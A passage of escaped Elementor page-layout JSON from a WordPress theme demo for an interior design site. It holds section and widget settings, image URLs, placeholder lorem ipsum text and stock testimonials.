right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Philip-Johnson.jpg\",\"id\":1161,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/pexels-lina-kivaka-1841143.jpg\",\"id\":2991,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/armin-djuhic-mcL2f-J74GY-unsplash.jpg\",\"id\":2996,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/minh-pham-OtXADkUh3-I-unsplash.jpg\",\"id\":3001,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"LOREM IPSUM\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">LOREM IPSUM<\\/span><\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. <\\/span><\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\nOur highlighted services\\nfor interior design\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"number_column\":\"four_column\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"post_per_page\":3,\"order_by\":\"ova_sev_met_order_sev\",\"order\":\"ASC\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why choose ?\",\"description\":\"There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\\n\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-why-choose.jpg\",\"id\":2090,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout retirio\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure 